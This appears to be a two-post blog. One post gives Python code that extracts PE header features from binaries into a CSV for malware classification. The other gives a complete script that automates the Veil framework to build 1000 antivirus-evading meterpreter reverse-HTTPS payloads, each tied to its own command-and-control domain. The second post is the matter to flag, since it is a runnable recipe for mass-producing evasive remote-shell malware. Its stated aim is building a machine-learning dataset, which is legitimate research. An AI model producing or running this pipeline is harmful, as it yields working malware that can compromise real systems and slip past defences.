Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

This post serves as a reminder of how to perform feature extraction on PE binaries using Python.
The code is based on Adobe's 2012 Malware Classifier, modified for my own purposes.
It uses the pefile Python module to read and work with PE files.
 
My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First, import the required Python libraries.
import os
import pefile
import pandas as pd
import hashlib

Next, define a function that computes the MD5 hash of a file given its filename. Note: the filename must include the full path if the binary is located in a different directory from the Python script.
def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

Next define a python class to represent the PE binary file.
class PEFile:
    """Feature view of a single PE binary, parsed with the ``pefile`` module.

    Every instance attribute except ``pe`` (the parsed ``pefile.PE`` object)
    is a feature; ``Construct`` returns them as a dictionary. Attributes are
    assigned in a fixed order because that order becomes the key order of the
    dictionary returned by ``Construct``.
    """

    def __init__(self, filename):
        """Parse *filename* and record header, section and import features.

        Binaries without an import table get import counts of 0, and binaries
        with fewer than two sections get ``VirtualSize2 = 0``, instead of
        raising and being lost from the dataset.

        Any exception raised by ``open``, ``pefile.PE`` or ``md5sum`` (for
        example on an unreadable or malformed file) propagates to the caller.
        """
        # The with-block closes the file; no explicit close() is needed.
        with open(filename, "rb") as file_content:
            # fast_load skips the data directories; they are parsed explicitly
            # below, once the header features have been read.
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)

        optional_header = self.pe.OPTIONAL_HEADER
        # Data-directory slots used here: 0 = export, 2 = resource,
        # 6 = debug, 12 = import address table (IAT).
        data_directory = optional_header.DATA_DIRECTORY

        self.filename = filename
        self.DebugSize = data_directory[6].Size
        self.DebugRVA = data_directory[6].VirtualAddress
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = data_directory[0].VirtualAddress
        self.ExportSize = data_directory[0].Size
        self.IATRVA = data_directory[12].VirtualAddress
        self.ResSize = data_directory[2].Size
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # Virtual size of the second section; 0 when the binary has fewer
        # than two sections.
        sections = self.pe.sections
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        self.pe.parse_data_directories()
        dll_count, function_count = self._count_imports(self.pe)
        # Despite its name, ImportFunctionCount is the number of import
        # descriptors (imported DLLs); ImportFunctionMethodCount is the total
        # number of imported symbols across all of them.
        self.ImportFunctionCount = dll_count
        self.ImportFunctionMethodCount = function_count
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    @staticmethod
    def _count_imports(pe):
        """Return ``(descriptor_count, imported_symbol_count)`` for *pe*.

        ``DIRECTORY_ENTRY_IMPORT`` is only present on the parsed object when
        the binary has an import directory, so a missing attribute is treated
        as "no imports" rather than an error.
        """
        dll_count = 0
        function_count = 0
        for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
            dll_count += 1
            function_count += sum(1 for _ in entry.imports)
        return dll_count, function_count

    def Construct(self):
        """Return the features as a ``{name: value}`` dictionary.

        The parsed ``pe`` object is left out so that only plain feature
        values remain.
        """
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print ("Construct completed")
        return sample

Function that walks a directory tree looking for PE files. The PE header and section information of each file is extracted into a Python dictionary, and a dictionary holding the results for all files is returned.
def pe2vec(directory=None):
    """Extract features from every file found under *directory*.

    The directory is walked recursively. Each file is loaded with ``PEFile``
    and its ``Construct()`` dictionary is stored under the file's base name.
    Files that fail to load are reported and skipped.

    Args:
        directory: Root directory to scan. When omitted, the original
            hard-coded sample directory is used.

    Returns:
        A dictionary mapping file name to that file's feature dictionary.

    NOTE: keys are base names only, so two files with the same name in
    different subdirectories overwrite each other (the later one wins).
    """
    if directory is None:
        # Original hard-coded location, kept as the default so existing
        # pe2vec() calls behave as before.
        directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"

    # dataset maps file name -> feature dictionary
    dataset = {}
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                # Construct() returns a dictionary with feature names as keys
                dataset[str(f)] = PEFile(file_path).Construct()
            except Exception as e:
                # Best effort: one unreadable or non-PE file must not abort
                # the whole scan. Name the file so the failure can be traced.
                print ("Skipping " + file_path + ": " + str(e))
    return dataset

Function that saves the Python dictionary returned by pe2vec() to a CSV file.
def saveToCSV(dataset, csv_path=None):
    """Write *dataset* to a CSV file with one row per sample.

    Args:
        dataset: Dictionary mapping sample name to its feature dictionary,
            as returned by ``pe2vec``.
        csv_path: Destination file. When omitted, the original hard-coded
            output path is used.
    """
    if csv_path is None:
        # Original hard-coded destination, kept as the default so existing
        # saveToCSV(dataset) calls behave as before.
        csv_path = 'C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'
    # DataFrame(dataset) puts samples in columns; transpose so that each
    # sample becomes a row and each feature a column.
    df = pd.DataFrame(dataset)
    infected = df.transpose()
    infected.to_csv(csv_path, sep=',', encoding='utf-8')
    


Full Code is shown below:
import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    hash = hashlib.md5()
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(blocksize), b""):
            hash.update(block)
    return hash.hexdigest()

class PEFile:
    """Feature view of a single PE binary, parsed with the ``pefile`` module.

    Every instance attribute except ``pe`` (the parsed ``pefile.PE`` object)
    is a feature; ``Construct`` returns them as a dictionary. Attributes are
    assigned in a fixed order because that order becomes the key order of the
    dictionary returned by ``Construct``.
    """

    def __init__(self, filename):
        """Parse *filename* and record header, section and import features.

        Binaries without an import table get import counts of 0, and binaries
        with fewer than two sections get ``VirtualSize2 = 0``, instead of
        raising and being lost from the dataset.

        Any exception raised by ``open``, ``pefile.PE`` or ``md5sum`` (for
        example on an unreadable or malformed file) propagates to the caller.
        """
        # The with-block closes the file; no explicit close() is needed.
        with open(filename, "rb") as file_content:
            # fast_load skips the data directories; they are parsed explicitly
            # below, once the header features have been read.
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)

        optional_header = self.pe.OPTIONAL_HEADER
        # Data-directory slots used here: 0 = export, 2 = resource,
        # 6 = debug, 12 = import address table (IAT).
        data_directory = optional_header.DATA_DIRECTORY

        self.filename = filename
        self.DebugSize = data_directory[6].Size
        self.DebugRVA = data_directory[6].VirtualAddress
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = data_directory[0].VirtualAddress
        self.ExportSize = data_directory[0].Size
        self.IATRVA = data_directory[12].VirtualAddress
        self.ResSize = data_directory[2].Size
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # Virtual size of the second section; 0 when the binary has fewer
        # than two sections.
        sections = self.pe.sections
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        self.pe.parse_data_directories()
        dll_count, function_count = self._count_imports(self.pe)
        # Despite its name, ImportFunctionCount is the number of import
        # descriptors (imported DLLs); ImportFunctionMethodCount is the total
        # number of imported symbols across all of them.
        self.ImportFunctionCount = dll_count
        self.ImportFunctionMethodCount = function_count
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    @staticmethod
    def _count_imports(pe):
        """Return ``(descriptor_count, imported_symbol_count)`` for *pe*.

        ``DIRECTORY_ENTRY_IMPORT`` is only present on the parsed object when
        the binary has an import directory, so a missing attribute is treated
        as "no imports" rather than an error.
        """
        dll_count = 0
        function_count = 0
        for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
            dll_count += 1
            function_count += sum(1 for _ in entry.imports)
        return dll_count, function_count

    def Construct(self):
        """Return the features as a ``{name: value}`` dictionary.

        The parsed ``pe`` object is left out so that only plain feature
        values remain.
        """
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print ("Construct completed")
        return sample
    
def pe2vec(directory=None):
    """Extract features from every file found under *directory*.

    The directory is walked recursively. Each file is loaded with ``PEFile``
    and its ``Construct()`` dictionary is stored under the file's base name.
    Files that fail to load are reported and skipped.

    Args:
        directory: Root directory to scan. When omitted, the original
            hard-coded sample directory is used.

    Returns:
        A dictionary mapping file name to that file's feature dictionary.

    NOTE: keys are base names only, so two files with the same name in
    different subdirectories overwrite each other (the later one wins).
    """
    if directory is None:
        # Original hard-coded location, kept as the default so existing
        # pe2vec() calls behave as before.
        directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"

    # dataset maps file name -> feature dictionary
    dataset = {}
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                # Construct() returns a dictionary with feature names as keys
                dataset[str(f)] = PEFile(file_path).Construct()
            except Exception as e:
                # Best effort: one unreadable or non-PE file must not abort
                # the whole scan. Name the file so the failure can be traced.
                print ("Skipping " + file_path + ": " + str(e))
    return dataset
    
def saveToCSV(dataset, csv_path=None):
    """Write *dataset* to a CSV file with one row per sample.

    Args:
        dataset: Dictionary mapping sample name to its feature dictionary,
            as returned by ``pe2vec``.
        csv_path: Destination file. When omitted, the original hard-coded
            output path is used.
    """
    if csv_path is None:
        # Original hard-coded destination, kept as the default so existing
        # saveToCSV(dataset) calls behave as before.
        csv_path = 'C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'
    # DataFrame(dataset) puts samples in columns; transpose so that each
    # sample becomes a row and each feature a column.
    df = pd.DataFrame(dataset)
    infected = df.transpose()
    infected.to_csv(csv_path, sep=',', encoding='utf-8')
    
# Script entry point: extract the features of every sample found by pe2vec(),
# then write the resulting dictionary to the CSV dataset.
pedata = pe2vec()
saveToCSV(pedata)





Saturday, August 11, 2018

Automating generation of VEIL payloads

This post serves as a journal of the technique used for automating generation of VEIL payloads. 
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: VEIL framework in itself is a payload generation framework designed for evasion of Anti-Virus. 

Overview:
1) On a Kali Linux VM
2) Install VEIL framework

apt update
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and paste in the Python script below. Save it as veil_malware_generation_script.py in the Veil directory (/usr/share/veil).

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

# Read the domain names to use. Each CSV row supplies the C&C host in its
# first column and the output binary name in its second column.
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
# describe() only returns the summary; print it so it is actually shown.
print (df.describe())
print ("Loaded domain name file")
print("")

# Text searched for in Veil's stdout: finding it means the payload was built.
correctmsg = "Metasploit Resource file written to:"
# Error text searched for in Veil's stdout; when present the build is retried.
errmsg = "bignum too big to convert"

# Index of the first CSV row to process; rows before it are skipped.
startfrom = 0

# Upper bound on Veil invocations per row, so that a payload which can never
# be generated does not stall the whole run in an endless retry loop.
max_attempts = 10

for index, row in df.iterrows():
    # Positional access via .iloc: the column labels come from the CSV header.
    domain = str(row.iloc[0])
    name = str(row.iloc[1])

    if startfrom > index:
        print ("skip: " + name)
        continue

    # The domain itself is handed to Veil; it is resolved here only to detect
    # unresolvable names, which fall back to the loopback address.
    host = domain
    try:
        addr = socket.gethostbyname(domain)
        print(addr)
    except socket_error as serr:
        # EAI_NONAME: the name does not resolve. Other lookup errors leave
        # the domain unchanged, as before.
        if serr.errno == socket.EAI_NONAME:
            print ("Domain: " + domain + " is unresolvable, using default IP value instead.")
            host = "127.0.0.1"

    command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + host + " --port 443"
    binaryname = name + ".exe"
    print (command)

    veil_args = ['./Veil.py', '-t', 'Evasion', '-p', 'cs/meterpreter/rev_https.py',
                 '--ip', host, '--port', '443', '-o', name]

    succeeded = False
    for attempt in range(1, max_attempts + 1):
        proc = subprocess.Popen(veil_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        raw = proc.communicate()[0]
        # communicate() returns bytes on Python 3; decode so the substring
        # checks and the string concatenation below work on Python 2 and 3.
        output = raw if isinstance(raw, str) else raw.decode("utf-8", "replace")

        if correctmsg in output:
            succeeded = True
            break

        if errmsg in output:
            print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
        print ("error: " + output)

    if not succeeded:
        print ("Giving up on " + binaryname + " after " + str(max_attempts) + " attempts.")
        print ("")
        continue

    print ("Command: " + command + " is successful.")
    # No rename step is needed: the output name is passed to Veil with -o.
    print ("Saving as :" + binaryname)
    print ("Saved")
    print ("")
 

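4) Create a CSV file (for example with Excel) and save it as website.csv in the same directory as the script. The first row is a header row; every following row describes one payload, with the C&C domain name in the first column and the output binary name (without the .exe extension) in the second column.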


5) Execute the Python script 

cd /usr/share/veil
python veil_malware_generation_script.py

6) The generated malware samples are saved in /var/lib/veil/output/compiled

7) VEIL is really fast: it took about 20 minutes to generate the 1000 malware samples.